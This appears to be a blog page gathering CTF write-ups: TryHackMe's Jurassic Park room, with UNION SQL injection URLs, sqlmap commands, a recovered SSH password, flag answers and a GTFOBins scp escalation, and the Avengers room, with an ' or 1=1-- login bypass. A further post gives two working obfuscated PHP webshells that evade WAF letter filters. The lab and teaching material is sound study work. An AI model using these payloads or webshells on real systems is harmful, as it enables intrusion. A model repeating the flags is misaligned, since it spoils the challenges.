thm-jurassicpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Jurassicpark at

This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too…

You’re also going to want to turn up your devices volume (firefox is recommended). So, deploy the VM and get hacking..

Please connect to our network before deploying the machine.


#1 What is the SQL database called which is serving the shop information?
#2 How many columns does the table have?
#3 Whats the system version?
ubuntu 16.04
┌─[user@parrot-virtual]─[~] └──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
#4 What is dennis’ password?
┌─[user@parrot-virtual]─[~]
└──╼ $curl http://10.10.28.121/item.php?id=5%20union%20select%201,password,3,4,5%20FROM%20users
#5 Locate and get the first flag contents.

b89f2d69c56b9981ac92dd267f

#6 Whats the contents of the second flag?
96ccd6b429be8c9a4b501c7a0b117b0a
#7 Whats the contents of the third flag?
b4973bbc9053807856ec815db25fb3f1
#8 There is no fourth flag.
#9 Whats the contents of the fifth flag?
2a7074e491fcacc7eeba97808dc5e2ec

We will start with a version scan with script of the top ports on the site:

Image for post

We have a ssh port open on port 22 and an Apache web service open on port 80.

Image for post

Lets navigate to the online shop:

Image for post

Here we can purchase a package, I will select the bronze package:

Image for post

The first thing to notice here is the address block which gives this page an ?id=2.

Image for post

From the tags relating to this box we know it involved SQLi or SQL injection. I am going to cycle through and change the ?id= from 0 to 5 and see what other pages it brings up.

?id=0 — No results found

?id=1 — Gold package

?id=2 — Bronze package

?id=3 — Basic package

?id=4 — No results found

?id=5 — Development package (Interesting)

Image for post

We have a user named Dennis. There is also a note saying that we cannot use certain characters, obviously the ‘ character is used in SQLi.

Let’s try and break the SQL using ?id=5‘ or 1=1

Image for post

So we are being blocked from using the ‘ character. This is why my initial trials using SQLMap did not work. So let try another special character that is not blocked ‘*’.

Image for post

As you can see, appending ?id=5* causes an error in the SQL, so it is fair to say that that the developer has been lazy with their code and this is vulnerable to a SQLi attack.

Lets first try to find out how many columns are in the database and see if we can perform a union exploit.

To do this we use the ‘order by’ statement and increase the number of columns until we get an error. So ?id=5 order by 1,2,3…..

Image for post

So our database has 5 columns, knowing this information we can use the union command to exploit the database and retrieve information, but first we need to see whether any of the columns are vulnerable, that is where the union command comes in, ?id=5 union all select 1,2,3….

Image for post

By adding 01,02,03,04 and 05 to the column numbers I can see those which are vulnerable. As some of the columns such as price prefix with a $ sign, we can use column 2,4 and 5 to pull information from the database. Column 1 does not appear on the website, so we cannot use that one either.

We need to find the database version, database name and we already know the number of columns.

Image for post

the database name is and the version is 

To pull the tables from the database we can use the following:

?id=1 union select 1,2,3 ,group_concat(table_name),5 from information_schema.tables where table_schema = database()

Image for post

We can see that we have two tables and 

Lets see if we can pull the columns relating the the table ‘users’. To do this we can use the following:

?id=1 union select 1,2,3, group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = “users”

Image for post

In the table ‘users’ we have the following columns – and 

Normally I would extend this further and pull all the usernames and passwords from the database; however, remember the webpage when ?id=5.

Image for post

The ‘username’ has been blocked; however, we can at least retrieve the password. We can extract the password using:

?id=5 union select 1,2,3,password,5 from users

Image for post

Although we cannot retrieve to username, we can assume that the username is Dennis and a password: ih8dinos. Hopefully these are the ssh credentials for port 22.

┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
<link rel="icon" type="image/png" href="assets/favicon.png"/>

<!DOCTYPE html>
<html lang="en">
<head>
<title>Buy, Buy, Buy</title>--snip--


<h1>5.7.25-0ubuntu0.16.04.2 Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $3</h3></br>
<div class="alert alert-primary" role="alert"><b>5</b> of these packages have been sold in the last hour.</div></br>
<h4>4</h4>
</br><h4>Order yours quick by calling us!</h4>

</div>
</body>
</html>
┌─[user@parrot-virtual]─[~]

Or we simply use sqlmap to do all the work !

┌─[user@parrot-virtual]─[~]
 └──╼ $sqlmap -r http://10.10.114.167/item.php?id=1 --batch --dump --threads 10 --batch

-> dennis / ih8dinos

Image for post

We are in, exploring the home directory for Dennis we find flag1.txt

Image for post

We can also read the .bash_history.

Image for post

In the .bash_history we can see the third flag. Also there is a lot of data regarding scp which is being run as sudo. Scp is a file transfer system for transferring file between computers using ssh. We can also see that flag5 is in the /root directory.

Lets check out if Dennis has any Sudo privileges:

Image for post

We can see that Dennis has full root privilege to run scp, which now explains the .bash_history.

Moving back to /home to see what other users we have. There is one called ubuntu which we cd into.

Image for post

There is an interesting file that stands out, which belongs to root called .viminfo which is also hidden. Although this is owned by root, we have full sudo privileges to copy this file to our local machine using scp.

You should have the ssh server already installed on Kali; however, you can check this with the following:

As I do not use ssh that much, I use ssh.socket, start the ssh server with the following:

# systemctl start ssh.socket

If you want a great guid for setting up the ssh server, check out the link below

How to Enable and Start SSH on Kali Linux – LMG Security

Here at LMG Security , we’re passionate about providing excellent cybersecurity services to organizations around the…

www.lmgsecurity.com

Anyway back to downloading the interesting .viminfo file to our local machine using scp.

Image for post

Back on our local machine we can cat the .viminfo file, which gives us some very interesting information.

Image for post

As you can see, we have the location of flagTwo, which can be found in /boot/grub/fonts.

We can cat this file and retrieve the second flag:

Image for post

We know there is no flag4 and we know that flag5 is in the /root directory.

Again we can use the sudo rights for scp to transfer flag5 to our local machine.

Image for post

There is another option that can be employed instead of transferring the files to the local machine using scp. Basically the binary scp is vulnerable and as it is owned by root, we can exploit this to escalate our privileges to root.

The go to resource for exploitable common binaries is GTFOBins:

GTFOBins

GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions…

gtfobins.github.io

A quick search on GTFOBins for scp with sudo rights gives us the following exploit:

Image for post

Lets enter this code as user Dennis and see what happens:

Image for post

How awesome is that, a few lines of code and full root access.

Author : Puckiestyle

thm-avengers-nl

Avengers Blog

Avengers Blog

https://tryhackme.com/room/avengers

[subscribers only room]



#1

On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

*Use the inspect element tool by hitting F12*

#2

Look at the HTTP response headers and obtain flag 2.

*You may have to scroll all the way up to see the original “/”*

#3

Look around the FTP share and read flag 3!

*This will download the file. From there just simply view the file*

#4

What is the directory that has an Avengers login?

*There should be one that sticks out from the list below*

gobuster dir -u http://10.10.158.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s

Hint

Have the username and password as ' or 1=1-- (include the apostrophe).

You should now see the following page above. We’re going to manually exploit this page using an attack called SQL injection.

SQL Injection is a code injection technique that manipulates an SQL query. You can execute you’re own SQL that could destroy the database, reveal all database data (such as usernames and passwords) or trick the web server in authenticating you.

To exploit SQL, we first need to know how it works. A SQL query could be SELECT * FROM Users WHERE username = {User Input} AND password = {User Input 2} , if you insert additional SQL as the {User Input} we can manipulate this query. For example, if I have the {User Input 2} as ' 1=1 we could trick the query into authenticating us as the  character would break the SQL query and 1=1 would evaluate to be true.

To conclude, having our first {User Input} as the username of the account and {User Input 2} being the condition to make the query true, the final query would be:
SELECT * FROM Users WHERE username = `admin` AND password = `' 1=1`

This would authenticate us as the admin user.

#5

Log into the Avengers site. View the page source, how many lines of code are there?

*View the source*

#6

Read the contents of flag5.txt

*Cat will not work. So let’s try the reverse of cat, ‘tac’. This will give us our flag. Flag will be under “flag5.txt”*

Protected: htb-feline-nl

This content is password protected. To view it please enter your password below:

Posted on

bypass-waf-php-webshell-without-numbers-letters

[Bypass WAF] Php webshell without numbers and letters

For bypass WAF, you can use some techniques to re-write your webshell.

Idea

First, clear ideas. My core idea is to non-letter, the characters of the characters through a variety of changes, and finally construct any az in the characters. And then use PHP to allow dynamic functions to perform the characteristics of splicing a function name, such as “assert”, and then the dynamic implementation of the.

So, the transformation method will be the main point to solve this problem.

But before that, I need to talk about the difference between php5 and 7.

Php5 assert is a function, we can use $f='assert';$f(...);this method to dynamically execute arbitrary code.

But php7, assert is no longer a function, into a language structure (similar to eval), can not be used as a function name dynamic implementation of the code, so use a little more complicated. But there is no need to worry too much, for example, we use the file_put_contents function, the same can be used to gethell.

For the sake of convenience, use PHP5 as the environment, PHP7 related to the use of their own way to explore it.

Method 1

This is the easiest and easiest way to think about it. In PHP, the two strings after the implementation of XOR operation, or a string. So, we want to get a letter in az, to find a two non-letter, the number of characters, their XOR results can be the letter.

Get the following results:

<?php
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
$___=$$__;
$_($___[_]); // assert($_POST[_]);

The results are as follows:

Method 2

Using PHP a little skill, look at the document: http://php.net/manual/en/language.operators.increment.php

PHP follows Perl’s convention when dealing with arithmetic operations on character variables and not C’s. For example, in PHP and Perl $a = ‘Z’; $a++; turns $a into ‘AA’, while in C a = ‘Z’; a++; turns a into ‘[‘ (ASCII value of ‘Z’ is 90, ASCII value of ‘[‘ is 91). Note that character variables can be incremented but not decremented and even so only plain ASCII alphabets and digits (a-z, A-Z and 0-9) are supported. Incrementing/decrementing other character variables has no effect, the original string is unchanged.

So, how to get a variable for the string ‘a’?

Coarse, the first letter of the array (Array) is capitalized A, and the fourth letter is lowercase a. In other words, we can get both lowercase and capitalized A, which means that we can get az and AZ all the letters.

In PHP, if you want to join arrays and strings, the array will be converted to a string whose value is Array:

And then take the first letter of the string, you can get ‘A’.

Using this technique, I wrote the following webshell (because the PHP function is case insensitive, so we end up doing it ASSERT($_POST[_]):

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
 
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

@ not allowed , but not needed 😉 , it just avoids errors but the execution follows on [ setting @ or not ]

Protected: htb-omni-nl

This content is password protected. To view it please enter your password below:

Posted on

Protected: htb-laser-nl

This content is password protected. To view it please enter your password below:

Posted on